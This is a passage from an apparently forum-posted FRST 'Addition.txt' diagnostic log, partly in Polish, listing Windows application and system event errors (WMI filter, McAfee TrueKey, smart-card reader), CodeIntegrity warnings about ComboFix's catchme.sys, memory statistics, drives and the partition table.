Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (05/30/2017 08:13:12 AM) (Source: Aktualizacja Programu Płatnik) (EventID: 0) (User: )
Description: Service cannot be started. Nieprawidłowe dojście

Error: (05/30/2017 08:08:35 AM) (Source: FirebirdGuardianDefaultInstance) (EventID: 281) (User: )
Description: Event-ID 281

Error: (05/29/2017 10:09:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (05/29/2017 10:09:10 AM) (Source: Aktualizacja Programu Płatnik) (EventID: 0) (User: )
Description: Service cannot be started. Nieprawidłowe dojście

Error: (05/24/2017 10:11:52 AM) (Source: TrueKey) (EventID: 0) (User: )
Description: Failed to process session change.
System.ArgumentException: Data Source cannot be empty. Use :memory: to open an in-memory database
   at System.Data.SQLite.SQLiteConnection.Open()
   at McAfee.YAP.Service.Data.McBioSQLite.GetConnection()
   at McAfee.YAP.Service.Data.McBioSQLite.StoreInServiceInfo(String key, String value)
   at McAfee.YAP.Service.Common.McBioBCAService.DisableSpoofingMode()
   at McAfee.YAP.Service.Service.OnSessionChange(SessionChangeDescription changeDescription)
   at System.ServiceProcess.ServiceBase.DeferredSessionChange(Int32 eventType, Int32 sessionId)

Error: (05/24/2017 10:11:47 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (05/24/2017 10:11:16 AM) (Source: Aktualizacja Programu Płatnik) (EventID: 0) (User: )
Description: Service cannot be started. Nieprawidłowe dojście

Error: (05/22/2017 07:37:14 PM) (Source: TrueKey) (EventID: 0) (User: )
Description: Failed to process session change.
System.ArgumentException: Data Source cannot be empty. Use :memory: to open an in-memory database
   at System.Data.SQLite.SQLiteConnection.Open()
   at McAfee.YAP.Service.Data.McBioSQLite.GetConnection()
   at McAfee.YAP.Service.Data.McBioSQLite.StoreInServiceInfo(String key, String value)
   at McAfee.YAP.Service.Common.McBioBCAService.DisableSpoofingMode()
   at McAfee.YAP.Service.Service.OnSessionChange(SessionChangeDescription changeDescription)
   at System.ServiceProcess.ServiceBase.DeferredSessionChange(Int32 eventType, Int32 sessionId)

Dziennik System:
=============
Error: (05/30/2017 08:17:52 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi Usługa Google Update (gupdate) z powodu następującego błędu: Nie można odnaleźć określonego pliku.

Error: (05/30/2017 08:15:14 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: Usługa Intel(R) Biometric and Context Agent Service zawiesiła się podczas uruchamiania.

Error: (05/30/2017 08:14:44 AM) (Source: SCardSvr) (EventID: 610) (User: )
Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00

Error: (05/30/2017 08:14:43 AM) (Source: SCardSvr) (EventID: 610) (User: )
Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00

Error: (05/30/2017 08:14:43 AM) (Source: SCardSvr) (EventID: 610) (User: )
Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00

Error: (05/30/2017 08:14:42 AM) (Source: SCardSvr) (EventID: 610) (User: )
Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00

Error: (05/30/2017 08:14:42 AM) (Source: SCardSvr) (EventID: 610) (User: )
Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00

Error: (05/30/2017 08:14:42 AM) (Source: SCardSvr) (EventID: 610) (User: )
Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00

Error: (05/30/2017 08:14:42 AM) (Source: SCardSvr) (EventID: 610) (User: )
Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00

Error: (05/30/2017 08:14:42 AM) (Source: SCardSvr) (EventID: 610) (User: )
Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00

CodeIntegrity:
===================================
Date: 2017-05-20 15:36:12.431
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-05-20 15:36:12.384
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-05-20 15:36:12.338
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-05-20 15:36:12.291
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-05-12 09:46:10.626
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-05-12 09:46:10.579
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-05-12 09:46:10.530
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-12 09:46:10.483 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-04-17 19:05:47.063 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-04-17 19:05:47.016 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. 
==================== Statystyki pamięci ===========================

Procesor: Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz
Procent pamięci w użyciu: 39%
Całkowita pamięć fizyczna: 4014.54 MB
Dostępna pamięć fizyczna: 2435.25 MB
Całkowita pamięć wirtualna: 8027.27 MB
Dostępna pamięć wirtualna: 6000.07 MB

==================== Dyski ================================

Drive c: (OS) (Fixed) (Total:453.99 GB) (Free:332.61 GB) NTFS
Drive y: (RECOVERY) (Fixed) (Total:11.73 GB) (Free:2.65 GB) NTFS ==>[system z komponentami startowymi (pozyskano odczytując dysk)]

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 561EAE20)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=11.7 GB) - (Type=27)
Partition 3: (Not Active) - (Size=454 GB) - (Type=07 NTFS)

==================== Koniec Addition.txt ============================